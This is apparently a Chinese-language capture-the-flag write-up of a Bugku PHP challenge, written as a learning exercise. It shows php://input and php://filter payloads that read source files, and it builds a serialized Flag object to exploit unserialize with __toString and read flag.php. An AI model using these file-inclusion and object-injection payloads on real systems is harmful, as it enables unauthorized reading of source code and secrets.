今天终于拾起来ctf的比赛了,开始了练习之旅。今天写一道bugku上的题目wp,属于利用php源码泄漏的题目吧,我觉得不是很简单。。。所以把自己的思路放上来。
题目源头:http://120.24.86.145:8006/test1/
题目打开后得到如下的信息,查看源码后发现
很显然想让我们利用源码去得到flag。这里我们稍微解释下这个源码的意思。
开始有三个变量:user,file,pass,但是我们发现这里的pass也就是password没有什么用,所以我们重点关注前两个变量。看下面的条件
(1)这里isset的意思是查看变量是否存在,即user不能为空。
(2)
file_get_contents是把整个文件读入字符串中,这里也就是把user这个变量(user显然要是一个文件)的内容以字符串的方式读出来并且要和“welcome to the bugkuctf”完全相等(类型,内容)。
(3)后面提示了我们所以我们要在满足条件之后读取file=hint.php。
知道了以上的三个条件后我们就可以做第一步了,就是如何满足他们的条件!?
这里就要使用php伪协议了。这道题目为了解决第二个条件,要用到 “php://input”协议。大致的意思是让 txt=php://input ,之后在post过去一个字符串
(当传进去的参数作为文件名变量去打开文件时,可以将参数php://传进,同时post方式传进去值作为文件内容,供php代码执行时当做文件内容读取)类似(PS:此时payload还不完整还不能执行哈)
简单来说就是将指定字符串作为文件传给txt,然后再将user的内容读出来。此时我们就满足了。
之后我们得到了
此时根据提示我们可以把包含的文件读出来了,这里要用到php的第二个伪协议:php://filter
这里放上一个写的详细的blog(关于filter的)http://blog.csdn.net/wy_97/article/details/77431111
即 txt=php://input&file=php://filter/read=convert.base64-encode/resource=hint.php(简单来说就是利用伪协议读取所包含文件的base64值)得到
解码得到:
- #hint.php
- <?php
- class Flag{ //flag.php
- public $file;
- public function __tostring(){
- if(isset($this->file)){
- echo file_get_contents($this->file);
- echo "<br>";
- return ("good");
- }
- }
- }
- ?>
之后可以继续利用伪协议读取一下index.php源码
- #index.php
- <?php
- $txt = $_GET["txt"];
- $file = $_GET["file"];
- $password = $_GET["password"];
- if(isset($txt)&&(file_get_contents($txt,'r')==="welcome to the bugkuctf")){
- echo "hello friend!<br>";
- if(preg_match("/flag/",$file)){
- echo "不能现在就给你flag哦";
- exit();
- }else{
- include($file);
- $password = unserialize($password);
- echo $password;
- }
- }else{
- echo "you are not the number of bugku ! ";
- }
- ?>
- <!--
- $user = $_GET["txt"];
- $file = $_GET["file"];
- $pass = $_GET["password"];
- if(isset($user)&&(file_get_contents($user,'r')==="welcome to the bugkuctf")){
- echo "hello admin!<br>";
- include($file); //hint.php
- }else{
- echo "you are not admin ! ";
- }
- -->
在index里我们能读出来:
(1)在hint.php中我们看到了,所以我们把index.php改成flag.php看看会有什么结果,发现
这个乱码在index.php中我们发现是
所以我们不能直接读flag.php。在index中我们看到这个意思是file中如果包含‘flag’,那么就会给你退出。所以我们要想其他办法读flag.php
(2)我们载去找有用的信息,发现这个else写到如果我的file不包含‘flag’,那么我就会把那个文件包含进来,之后将password反序列化一下。并输出password的结果。而我们根据上面的hint.php发现,
- #hint.php
- <?php
- class Flag{ //flag.php
- public $file;
- public function __tostring(){
- if(isset($this->file)){
- echo file_get_contents($this->file);
- echo "<br>";
- return ("good");
- }
- }
- }
- ?>
我们发现当Flag方法当做字符串执行时,会自动执行 __tostring 方法,方法中写了如果file文件存在,那么就输出file文件中的内容。
这不正是我们要解决的输出flag.php内容的情况吗???所以我们要构造一个Flag类型的参数,并把这个参数传给password然后get进去。并且这个file的值要是hint.php(因为要利用hint.php中的函数),即:————根据php序列化的结果
- <?php
- class Flag{
- public $file;
- }
- $a = new Flag();
- $a->file = "flag.php";
- $a = serialize($a);
- print_r($a);
- ?>
得到: O:4:"Flag":1:{s:4:"file";s:8:"flag.php";} 传入
得到
至此这道题目结束。不过应该会有同学问为何payload中有index.php,,我觉得index.php是默认的页面,不然你没有办法传给php页面参数,所以应该属于一种套路吧,记住就好。。。。
作为菜鸡,还要继续努力啊:)